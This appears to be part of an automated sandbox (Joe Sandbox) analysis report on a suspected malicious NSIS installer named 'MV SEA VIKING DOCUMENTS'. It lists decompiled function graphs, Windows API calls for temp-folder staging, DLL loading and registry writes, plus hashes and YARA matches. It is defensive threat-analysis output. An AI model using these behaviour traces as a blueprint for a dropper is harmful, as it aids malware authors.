                                                                                                                                                                                                                                control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 581 4017b5-4017b6 call 4067c4 574->581 575->581 584 4017bb-4017bf 581->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 593 4017dd-4017ef 585->593 594 4017cd-4017db CompareFileTime 585->594 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 593->586 594->593 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 598->584 633 401864-401865 598->633 609 401882-401888 599->609 613 402c33 609->613 611->612 615 4018d0-4018db CloseHandle 611->615 612->615 616 402c35-402c39 613->616 618 4018e1-4018e4 615->618 619 402c2a-402c2d 615->619 621 4018e6-4018f7 call 40657a lstrcatW 618->621 622 4018f9-4018fc call 40657a 618->622 619->613 626 401901-402398 621->626 622->626 631 40239d-4023a2 626->631 632 402398 call 405b9d 626->632 631->616 632->631 633->609 634 401867-401868 633->634 634->599
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll$Call
                                                                                                                                                                                                                                • API String ID: 1941528284-848832303
                                                                                                                                                                                                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1495540970-3234598986
                                                                                                                                                                                                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 887 40689a-4068ba GetSystemDirectoryW 888 4068bc 887->888 889 4068be-4068c0 887->889 888->889 890 4068d1-4068d3 889->890 891 4068c2-4068cb 889->891 893 4068d4-406907 wsprintfW LoadLibraryExW 890->893 891->890 892 4068cd-4068cf 891->892 892->893
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1041 405a6e-405ab9 CreateDirectoryW 1042 405abb-405abd 1041->1042 1043 405abf-405acc GetLastError 1041->1043 1044 405ae6-405ae8 1042->1044 1043->1044 1045 405ace-405ae2 SetFileSecurityW 1043->1045 1045->1042 1046 405ae4 GetLastError 1045->1046 1046->1044
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3449924974-3355392842
                                                                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 71491BFF: GlobalFree.KERNEL32(?), ref: 71491E74
                                                                                                                                                                                                                                  • Part of subcall function 71491BFF: GlobalFree.KERNEL32(?), ref: 71491E79
                                                                                                                                                                                                                                  • Part of subcall function 71491BFF: GlobalFree.KERNEL32(?), ref: 71491E7E
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 714918C5
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 7149194B
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71491970
                                                                                                                                                                                                                                  • Part of subcall function 7149243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7149246F
                                                                                                                                                                                                                                  • Part of subcall function 71492810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71491896,00000000), ref: 714928E0
                                                                                                                                                                                                                                  • Part of subcall function 71491666: wsprintfW.USER32 ref: 71491694
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                                • Opcode ID: 4ce172791e3e09c79f71b9b1a85dc5af3d47354e752cef5c743868666a101e88
                                                                                                                                                                                                                                • Instruction ID: 114c61f187d66a27ea582fd41f85167a194b37ef7136ec77d45efa8d7c951e71
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ce172791e3e09c79f71b9b1a85dc5af3d47354e752cef5c743868666a101e88
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4241C2B28042029FEB119F20D984F953FBCAF14774F14446AED4BAE286DB74C484C7A8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 2655323295-4141617732
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 3248276644-3444943300
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                • API String ID: 1716503409-944333549
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 1892508949-670666241
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00425A20,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: ;!#'
                                                                                                                                                                                                                                • API String ID: 1029625771-608325217
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: `
                                                                                                                                                                                                                                • API String ID: 1029625771-1850852036
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                                • Opcode ID: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
